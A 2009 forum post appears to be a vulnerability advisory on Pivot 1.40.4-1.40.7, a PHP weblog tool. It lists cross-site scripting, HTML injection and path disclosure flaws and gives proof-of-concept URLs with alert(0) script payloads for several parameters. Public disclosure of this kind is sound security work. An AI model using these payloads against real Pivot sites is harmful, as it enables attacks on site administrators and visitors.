InterN0T - Advisories Advisories that are found by members of InterN0T.

InterN0T Affiliates:
EvilZonepy1337

SirCapsAlot.NET

Reply
 
LinkBack (6) Thread Tools Display Modes
  6 links from elsewhere to this Post. Click to view. #1  
Old 12th June 2009, 21:47
MaXe's Avatar
The BOFH
 
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 2,718
Blog Entries: 31
Rep Power: 10
Reputation: 146
MaXe will become a Token soonMaXe will become a Token soon
[InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities

Pivot - XSS and HTML Injection Vulnerabilities

Versions Affected: 1.40.4 and 1.40.7 (22nd March 2009) (newest)

Info: Pivot is a web-based tool to help you maintain dynamic sites, like
weblogs or online journals. Pivot is released under the GPL so it is
completely free to use. It is written in PHP, and does not require
additional libraries or databases to function.

Credits: InterN0T

External Links:
http://www.pivotlog.net/


-:: The Advisory ::-
Quote:
Vulnerable Function / ID Calls:
url, menu, sort, check[], edituser, edit, blog, cat.

Path Disclosure:
http://[HOST]/pivot/pivot/tb.php?tb_id=1&url='

Cross Site Scripting: (can only be triggered when One is not logged in).
http://[HOST]/pivot/pivot/index.php?menu="><script>alert(0)</script><br

Cross Site Scripting: (triggers on logged in administrators only) [low or no impact due to session-key in url]
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&sort=" ><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doacti on=1&action=delete&check[]='><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doacti on=1&action=delete&check['><script>alert(0)</script>]=0
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=adm in&do=edituser&edituser=</title><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=adm in&do=templates&edit=<script>alert(0)</script>

http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=adm in&do=blog_edit1&blog="><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=adm in&do=cat_edit&cat="><script>alert(0)</script>

Cross Site Scripting using Post Method: (triggers on logged in administrators only) [low impact - see above] << Filter Field.
'><script>alert(0)</script> in
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doacti on=1

HTML Injection: (this will only affect the user logged in apparently..)
http://[HOST]/pivot/pivot/user.php?func=edit_prefs&w=my_weblog
sign up formular (all fields might be, but url is recommended to use)
(use "> to escape tag)
http://[HOST]/pivot/pivot/user.php?func=reg_user&w=my_weblog

http://[HOST]/pivot/pivot/user.php?func=reg_user&w=my_weblog
-- Set username to <script>alert(0)</script>
--- It is possible to trigger it other places such as in the title or in the "hidden" input variable.
---- Use "> to escape the hidden tag and </title> to escape the title tag.

Affected Admin Site:
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=adm in&do=editcommuser&edituser=VALIDUSERHASH
-:: Solution ::-
The solution for this is not simple at all. I suggest a complete review
of the entire codebase.

Conclusion:
When we first checked the platform for vulnerabilities we had apparently
installed an old version, so we updated to the newest version which
apparently had some "XSS-bug fixed", strangely enough all the
vulnerabilities we found are still there.

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe
__________________
Code:
                                ____/____\_________________
                      \|/      | OMG IT'S TEH LEET STORY!! |
    /*\         /\    -*-      |______  ________/\_________|
   // \\       /  \   /|\        /    \/    \  /  \
  /// \\\     /    \            /            \/    \
   // \\     /      \          /      \o/     \     \
    | |     /        \        /        |       \     \
 ___| |____/          \______/________/ \_______\_____\_________
          /     o      \
               #"=-
               /\
 __________________________________________________________
    On a mission, to find the lost member of Teh Unkwon.. 
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On


LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/intern0t-advisories/1119-intern0t-pivot-1-40-4-7-multiple-vulnerabilities.html
Posted By For Type Date
US-CERT Cyber Security Bulletin SB09-180 -- Vulnerability Summary for the Week of June 22, 2009 This thread Refback 30th January 2010 20:53
Pivot Multiple Cross-Site Scripting and HTML Injection Vulnerabilities This thread Refback 19th July 2009 19:26
US-CERT Cyber Security Bulletin SB09-180 -- Vulnerability Summary for the Week of June 22, 2009 This thread Refback 29th June 2009 17:49
CVE - CVE-2009-2134 (under review) This thread Refback 26th June 2009 20:55
Pivot Multiple Cross Site Scripting And HTML Injection Vulnerabilities This thread Refback 15th June 2009 19:03
Pivot Multiple Cross-Site Scripting Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com This thread Refback 15th June 2009 14:54

Similar Threads
Thread Thread Starter Forum Replies Last Post
[InterN0T] AMember 3.1.7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 11 27th September 2009 19:09
[InterN0T] transLucid 1.75 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 22:02
[InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 21:58
[InterN0T] SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 21:51


All times are GMT +2. The time now is 05:40.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon

Hosted by 1and1